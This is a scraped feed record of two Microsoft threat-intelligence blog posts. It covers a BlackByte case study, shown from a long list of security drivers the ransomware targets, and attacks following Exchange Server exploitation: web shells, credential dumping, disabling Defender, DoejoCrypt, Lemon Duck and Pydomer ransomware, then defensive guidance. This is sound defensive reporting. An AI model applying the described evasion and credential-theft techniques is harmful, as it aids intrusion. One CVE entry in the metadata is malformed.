\nrgnt.sys| rmdiskmon.sys| rmphvmonitor.sys| rpwatcher.sys| rrmon32.sys \nrrmon64.sys| rsfdrv.sys| rsflt.sys| rspcrtw.sys| rsrtw.sys \nrswctrl.sys| rswmon.sys| rtologon.sys| rtw.sys| ruaff.sys \nrubrikfileaudit.sys| ruidiskfs.sys| ruieye.sys| ruifileaccess.sys| ruimachine.sys \nruiminispy.sys| rvsavd.sys| rvsmon.sys| rw7fsflt.sys| rwchangedrv.sys \nryfilter.sys| ryguard.sys| safe-agent.sys| safsfilter.sys| sagntflt.sys \nsahara.sys| sakfile.sys| sakmfile.sys| samflt.sys| samsungrapidfsfltr.sys \nsanddriver.sys| santa.sys| sascan.sys| savant.sys| savonaccess.sys \nscaegis.sys| scauthfsflt.sys| scauthiodrv.sys| scensemon.sys| scfltr.sys \nscifsflt.sys| sciptflt.sys| sconnect.sys| scred.sys| sdactmon.sys \nsddrvldr.sys| sdvfilter.sys| se46filter.sys| secdodriver.sys| secone_filemon10.sys \nsecone_proc10.sys| secone_reg10.sys| secone_usb.sys| secrmm.sys| secufile.sys \nsecure_os.sys| secure_os_mf.sys| securofsd_x64.sys| sefo.sys| segf.sys \nsegiraflt.sys| segmd.sys| segmp.sys| sentinelmonitor.sys| serdr.sys \nserfs.sys| sfac.sys| sfavflt.sys| sfdfilter.sys| sfpmonitor.sys \nsgresflt.sys| shdlpmedia.sys| shdlpsf.sys| sheedantivirusfilterdriver.sys| sheedselfprotection.sys \nshldflt.sys| si32_file.sys| si64_file.sys| sieflt.sys| simrep.sys \nsisipsfilefilter| sk.sys| skyamdrv.sys| skyrgdrv.sys| skywpdrv.sys \nslb_guard.sys| sld.sys| smbresilfilter.sys| smdrvnt.sys| sndacs.sys \nsnexequota.sys| snilog.sys| snimg.sys| snscore.sys| snsrflt.sys \nsodatpfl.sys| softfilterxxx.sys| soidriver.sys| solitkm.sys| sonar.sys \nsophosdt2.sys| sophosed.sys| sophosntplwf.sys| sophossupport.sys| spbbcdrv.sys \nspellmon.sys| spider3g.sys| spiderg3.sys| spiminifilter.sys| spotlight.sys \nsprtdrv.sys| sqlsafefilterdriver.sys| srminifilterdrv.sys| srtsp.sys| srtsp64.sys \nsrtspit.sys| ssfmonm.sys| ssrfsf.sys| ssvhook.sys| stcvsm.sys \nstegoprotect.sys| stest.sys| stflt.sys| stkrnl64.sys| storagedrv.sys \nstrapvista.sys| strapvista64.sys| svcbt.sys| swcommfltr.sys| swfsfltr.sys \nswfsfltrv2.sys| swin.sys| symafr.sys| symefa.sys| symefa64.sys \nsymefasi.sys| symevent.sys| symevent64x86.sys| symevnt.sys| symevnt32.sys \nsymhsm.sys| symrg.sys| sysdiag.sys| sysmon.sys| sysmondrv.sys \nsysplant.sys| szardrv.sys| szdfmdrv.sys| szdfmdrv_usb.sys| szedrdrv.sys \nszpcmdrv.sys| taniumrecorderdrv.sys| taobserveflt.sys| tbfsfilt.sys| tbmninifilter.sys \ntbrdrv.sys| tdevflt.sys| tedrdrv.sys| tenrsafe2.sys| tesmon.sys \ntesxnginx.sys| tesxporter.sys| tffregnt.sys| tfsflt.sys| tgfsmf.sys \nthetta.sys| thfilter.sys| threatstackfim.sys| tkdac2k.sys| tkdacxp.sys \ntkdacxp64.sys| tkfsavxp.sys| tkfsavxp64.sys| tkfsft.sys| tkfsft64.sys \ntkpcftcb.sys| tkpcftcb64.sys| tkpl2k.sys| tkpl2k64.sys| tksp2k.sys \ntkspxp.sys| tkspxp64.sys| tmactmon.sys| tmcomm.sys| tmesflt.sys \ntmevtmgr.sys| tmeyes.sys| tmfsdrv2.sys| tmkmsnsr.sys| tmnciesc.sys \ntmpreflt.sys| tmumh.sys| tmums.sys| tmusa.sys| tmxpflt.sys \ntopdogfsfilt.sys| trace.sys| trfsfilter.sys| tritiumfltr.sys| trpmnflt.sys \ntrufos.sys| trustededgeffd.sys| tsifilemon.sys| tss.sys| tstfilter.sys \ntstfsredir.sys| tstregredir.sys| tsyscare.sys| tvdriver.sys| tvfiltr.sys \ntvmfltr.sys| tvptfile.sys| tvspfltr.sys| twbdcfilter.sys| txfilefilter.sys \ntxregmon.sys| uamflt.sys| ucafltdriver.sys| ufdfilter.sys| uncheater.sys \nupguardrealtime.sys| usbl_ifsfltr.sys| usbpdh.sys| usbtest.sys| uvmcifsf.sys \nuwfreg.sys| uwfs.sys| v3flt2k.sys| v3flu2k.sys| v3ift2k.sys \nv3iftmnt.sys| v3mifint.sys| varpffmon.sys| vast.sys| vcdriv.sys \nvchle.sys| vcmfilter.sys| vcreg.sys| veeamfct.sys| vfdrv.sys \nvfilefilter.sys| vfpd.sys| vfsenc.sys| vhddelta.sys| vhdtrack.sys \nvidderfs.sys| vintmfs.sys| virtfile.sys| virtualagent.sys| vk_fsf.sys \nvlflt.sys| vmwvvpfsd.sys| vollock.sys| vpdrvnt.sys| vradfil2.sys \nvraptdef.sys| vraptflt.sys| vrarnflt.sys| vrbbdflt.sys| vrexpdrv.sys \nvrfsftm.sys| vrfsftmx.sys| vrnsfilter.sys| vrsdam.sys| vrsdcore.sys \nvrsdetri.sys| vrsdetrix.sys| vrsdfmx.sys| vrvbrfsfilter.sys| vsepflt.sys \nvsscanner.sys| vtsysflt.sys| vxfsrep.sys| wats_se.sys| wbfilter.sys \nwcsdriver.sys| wdcfilter.sys| wdfilter.sys| wdocsafe.sys| wfp_mrt.sys \nwgfile.sys| whiteshield.sys| windbdrv.sys| windd.sys| winfladrv.sys \nwinflahdrv.sys| winfldrv.sys| winfpdrv.sys| winload.sys| winteonminifilter.sys \nwiper.sys| wlminisecmod.sys| wntgpdrv.sys| wraekernel.sys| wrcore.sys \nwrcore.x64.sys| wrdwizfileprot.sys| wrdwizregprot.sys| wrdwizscanner.sys| wrdwizsecure64.sys \nwrkrn.sys| wrpfv.sys| wsafefilter.sys| wscm.sys| xcpl.sys \nxendowflt.sys| xfsgk.sys| xhunter1.sys| xhunter64.sys| xiaobaifs.sys \nxiaobaifsr.sys| xkfsfd.sys| xoiv8x64.sys| xomfcbt8x64.sys| yahoostorage.sys \nyfsd.sys| yfsd2.sys| yfsdr.sys| yfsrd.sys| zampit_ml.sys \nzesfsmf.sys| zqfilter.sys| zsfprt.sys| zwasatom.sys| zwpxesvr.sys \nzxfsfilt.sys| zyfm.sys| zzpensys.sys| | \n \n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>. \n\nThe post [The five-day job: A BlackByte ransomware intrusion case study](<https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T17:00:00", "type": "mmpc", "title": "The five-day job: A BlackByte ransomware intrusion case study", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16098", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2049-16098"], "modified": "2023-07-06T17:00:00", "id": "MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "href": "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-26T05:28:04", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig1-exchange-server-exploit-chain.png)\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks , we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig2-xx-bat.png)\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig3-xx-bat-actions.png)\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dopped the xx.bat file (in this instance, a version of Chopper):\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig4-doejocrypt-recon-command.png)\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig5-doejocrypt-ransomware-attack-chain.png)\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig6-doejocrypt-ransom-note.png)\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig7-lemon-duck-payload-executions.png)\n\n_Fig 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI Event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MPPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig8a-lemon-duck-payloads.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig8b-lemon-duck-payloads.png)\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig9-Lemon-Duck-post-exploitation-activities.png)\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig10-email-subjects-lemon-duck.png)\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig11-attachment-variables.png)\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig12-web-shell-names-pydomer.png)\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig13-Pydomer-post-exploitation-activities.png)\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig14-Pydomer-PowerShell-downloader-spreader-1024x317.png)\n\n_Figure 14. __PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first attempting to spread the payload over WMI using Invoke-WMIMethod to attempt to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig15-pydomer-ransom-note.png)\n\n_Figure 15. Pydomer __ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig16-pydomer-extortion-readme.png)\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig17-com-services-dll-lsass-dump.png)\n\n_Figure 17.__ Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like[ Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n \n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus **\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * 